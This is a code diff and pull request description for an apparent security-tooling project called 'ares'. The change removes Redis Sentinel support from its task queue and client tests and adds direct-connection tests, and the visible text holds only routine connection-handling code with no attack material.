@@ -246,66 +87,26 @@ async def test_create_redis_client_uses_url(monkeypatch: pytest.MonkeyPatch) -> 
     asyncio_module.from_url.assert_called_once()
 
 
-class MockRedisClient:
-    """Mock Redis client for testing ROLE verification."""
-
-    def __init__(self, role_response: list[Any] | Exception):
-        self.role_response = role_response
-        self.closed = False
-
-    async def execute_command(self, cmd: str) -> list[Any]:
-        if isinstance(self.role_response, Exception):
-            raise self.role_response
-        return self.role_response
-
-    async def aclose(self) -> None:
-        self.closed = True
-
-
 @pytest.mark.asyncio
-async def test_verify_redis_role_master() -> None:
-    """Test ROLE verification passes for master."""
-    client = MockRedisClient(["master", 12345, []])
-    assert await _verify_redis_role(client, expected_role="master") is True
-
-
-@pytest.mark.asyncio
-async def test_verify_redis_role_slave() -> None:
-    """Test ROLE verification fails when connected to slave instead of master."""
-    client = MockRedisClient(["slave", "192.168.58.10", 6379, "connected", 12345])
-    assert await _verify_redis_role(client, expected_role="master") is False
-
-
-@pytest.mark.asyncio
-async def test_verify_redis_role_bytes_response() -> None:
-    """Test ROLE verification handles bytes response."""
-    client = MockRedisClient([b"master", 12345, []])
-    assert await _verify_redis_role(client, expected_role="master") is True
-
-
-@pytest.mark.asyncio
-async def test_verify_redis_role_slave_expected() -> None:
-    """Test ROLE verification for slave role."""
-    client = MockRedisClient(["slave", "192.168.58.10", 6379, "connected", 12345])
-    assert await _verify_redis_role(client, expected_role="slave") is True
-
-
-@pytest.mark.asyncio
-async def test_verify_redis_role_error() -> None:
-    """Test ROLE verification handles errors gracefully."""
-    client = MockRedisClient(Exception("Connection error"))
-    assert await _verify_redis_role(client, expected_role="master") is False
-
-
-@pytest.mark.asyncio
-async def test_create_verified_redis_client_no_sentinel(monkeypatch: pytest.MonkeyPatch) -> None:
-    """Test verified client falls back to regular client when no Sentinel."""
+async def test_create_redis_client_direct_connection(monkeypatch: pytest.MonkeyPatch) -> None:
+    """Test that direct_connection uses single_connection_client."""
     asyncio_module = install_dummy_redis(monkeypatch)
-    asyncio_module.Sentinel = DummySentinel
-    asyncio_module.from_url = MagicMock(return_value="url-client")
 
-    monkeypatch.delenv("REDIS_SENTINEL_HOST", raising=False)
-    monkeypatch.delenv("REDIS_SENTINEL_MASTER", raising=False)
+    from_url_mock = MagicMock(return_value="url-client")
+    asyncio_module.from_url = from_url_mock
+
+    await create_redis_client("redis://localhost", direct_connection=True)
+
+    call_kwargs = from_url_mock.call_args[1]
+    assert call_kwargs["single_connection_client"] is True
+    assert call_kwargs["health_check_interval"] == 0
+
+
+@pytest.mark.asyncio
+async def test_create_verified_redis_client_delegates(monkeypatch: pytest.MonkeyPatch) -> None:
+    """Test verified client delegates to create_redis_client."""
+    asyncio_module = install_dummy_redis(monkeypatch)
+    asyncio_module.from_url = MagicMock(return_value="url-client")
 
     client = await create_verified_redis_client("redis://localhost", decode_responses=True)
 
@@ -335,8 +136,6 @@ class TestIsConnectionError:
             "getaddrinfo failed: Name does not resolve",
             "Temporary failure in name resolution",
             "No address associated with hostname",
-            # Sentinel failover errors
-            "No master found for 'aresmaster'",
         ],
     )
     def test_detects_connection_errors(self, error_message: str) -> None:

--- a/tests/core/test_task_queue.py
+++ b/tests/core/test_task_queue.py
@@ -401,7 +401,7 @@ class TestRedisTaskQueueConnectionErrorHandling:
     ):
         """Test poll_task handles asyncio.TimeoutError from hung BRPOP.
 
-        This tests the fix for stale Sentinel connections where BRPOP hangs
+        This tests the fix for stale connections where BRPOP hangs
         forever on a dead TCP socket. The asyncio.wait_for wrapper should
         detect this and reset connection state.
         """
@@ -413,22 +413,18 @@ class TestRedisTaskQueueConnectionErrorHandling:
 
         mock_redis_client.brpop = hung_brpop
 
-        with patch("ares.core.task_queue.invalidate_sentinel_client") as mock_invalidate:
-            # poll_task with timeout=0.1 should trigger asyncio.TimeoutError
-            # after 0.1 + 2.0 = 2.1 seconds, but we mock so it's faster
-            # Actually the wait_for will use timeout + 2.0, so we use a tiny timeout
-            # Using max_retries=0 to test single attempt behavior
-            result = await task_queue.poll_task(role="cracker", timeout=0.1, max_retries=0)
+        # poll_task with timeout=0.1 should trigger asyncio.TimeoutError
+        # after 0.1 + 2.0 = 2.1 seconds, but we mock so it's faster
+        # Actually the wait_for will use timeout + 2.0, so we use a tiny timeout
+        # Using max_retries=0 to test single attempt behavior
+        result = await task_queue.poll_task(role="cracker", timeout=0.1, max_retries=0)
 
-            # Should return None (not raise) to allow retry
-            assert result is None
+        # Should return None (not raise) to allow retry
+        assert result is None
 
-            # Connection state should be reset
-            assert task_queue._connected is False
-            assert task_queue._client is None
-
-            # Sentinel client should be invalidated for fresh DNS resolution
-            mock_invalidate.assert_called_once()
+        # Connection state should be reset
+        assert task_queue._connected is False
+        assert task_queue._client is None
 
     @pytest.mark.asyncio
     async def test_check_results_batch_dns_failure_resets_state(
@@ -453,19 +449,15 @@ class TestRedisTaskQueueConnectionErrorHandling:
         )
         mock_redis_client.pipeline = MagicMock(return_value=mock_pipeline)
 
-        with patch("ares.core.task_queue.invalidate_sentinel_client") as mock_invalidate:
-            # check_results_batch should return empty results on failure
-            results = await task_queue.check_results_batch(["task_1", "task_2"])
+        # check_results_batch should return empty results on failure
+        results = await task_queue.check_results_batch(["task_1", "task_2"])
 
-            # Should return dict with None values (not raise)
-            assert results == {"task_1": None, "task_2": None}
+        # Should return dict with None values (not raise)
+        assert results == {"task_1": None, "task_2": None}
 
-            # Connection state should be reset for retry
-            assert task_queue._connected is False
-            assert task_queue._client is None
-
-            # Sentinel client should be invalidated for fresh DNS resolution
-            mock_invalidate.assert_called_once()
+        # Connection state should be reset for retry
+        assert task_queue._connected is False
+        assert task_queue._client is None
 
     @pytest.mark.asyncio
     async def test_check_results_batch_connection_reset_resets_state(
@@ -477,12 +469,10 @@ class TestRedisTaskQueueConnectionErrorHandling:
         mock_pipeline.execute = AsyncMock(side_effect=Exception("Connection reset by peer"))
         mock_redis_client.pipeline = MagicMock(return_value=mock_pipeline)
 
-        with patch("ares.core.task_queue.invalidate_sentinel_client") as mock_invalidate:
-            results = await task_queue.check_results_batch(["task_1"])
+        results = await task_queue.check_results_batch(["task_1"])
 
-            assert results == {"task_1": None}
-            assert task_queue._connected is False
-            mock_invalidate.assert_called_once()
+        assert results == {"task_1": None}
+        assert task_queue._connected is False
 
     @pytest.mark.asyncio
     async def test_check_results_batch_non_connection_error_preserves_state(
@@ -690,17 +680,16 @@ class TestRedisTaskQueueResults:
 
         mock_redis_client.brpop = hung_brpop
 
-        with patch("ares.core.task_queue.invalidate_sentinel_client"):
-            # wait_for_result with timeout=0.1 should trigger asyncio.TimeoutError
-            # after 0.1 + 5.0 = 5.1 seconds, but we mock so it's faster
-            result = await task_queue.wait_for_result("task_stale", timeout=0.1)
+        # wait_for_result with timeout=0.1 should trigger asyncio.TimeoutError
+        # after 0.1 + 5.0 = 5.1 seconds, but we mock so it's faster
+        result = await task_queue.wait_for_result("task_stale", timeout=0.1)
 
-            # Should return None (not raise) to indicate timeout
-            assert result is None
+        # Should return None (not raise) to indicate timeout
+        assert result is None
 
-            # Connection state should be reset
-            assert task_queue._connected is False
-            assert task_queue._client is None
+        # Connection state should be reset
+        assert task_queue._connected is False
+        assert task_queue._client is None
 
     @pytest.mark.asyncio
     async def test_check_result_not_ready(self, task_queue, mock_redis_client):


### PR DESCRIPTION
**Key Changes:**

- Removed all Redis Sentinel-specific logic and configuration from codebase
- Refactored Redis client helpers to support only direct Redis connections
- Updated connection/reconnection logic to eliminate Sentinel DNS/IP refresh
- Simplified tests and documentation to reflect direct Redis usage only

**Added:**

- Manual test guide for multi-forest end-to-end operations (unrelated to
  Sentinel removal, but included in this change for completeness) -
  `docs/testing/MANUAL-ESSOS.md` documents manual steps for multi-domain attack
  chains


- New manual test guide for multi-forest/Essos compromise workflow, including
  all operational steps, troubleshooting, and known issues

**Changed:**

- Redis client creation helpers (`create_redis_client`, `create_verified_redis_client`)
  now use only direct Redis URL connections with optional single-connection mode
- All references to "Sentinel" failover, stale connections, or master discovery
  replaced with generic Redis connection handling and pod restart recovery
- Logging, comments, and error messages updated to no longer mention Sentinel
- Task queue, orchestrator, and dispatcher logic refactored to remove
  Sentinel-specific reconnection and state reset paths
- Documentation (`codemap.md`, inline code docs) updated to reflect removal
  of Sentinel features and clarify direct Redis usage


- All Redis-related health check, retry, and reconnection logic now targets
  direct connections, not Sentinel pools or master/replica roles
- Tests updated to remove patching and assertions related to
  `invalidate_sentinel_client` and Sentinel failover scenarios
- Env var documentation and code references updated to reflect direct Redis use

**Removed:**

- All Redis Sentinel support, including:
    - Sentinel connection pooling, master/replica discovery, and DNS resolution
    - `invalidate_sentinel_client` function and calls throughout codebase
    - Sentinel-related configuration and environment variable handling
    - Replica client and master role verification logic
    - Documentation and comments referencing Sentinel failover or pod restarts
- Sentinel-specific error handling and reconnection logic in orchestration,
  task queues, dispatcher monitoring, and recovery modules
- Sentinel handling and patching from all tests and test fixtures
- Redis Sentinel configuration, DNS resolution, and all related branching logic
- All code and tests for verifying master/replica roles and Sentinel failover
- Sentinel-specific error keywords and handling logic across modules and tests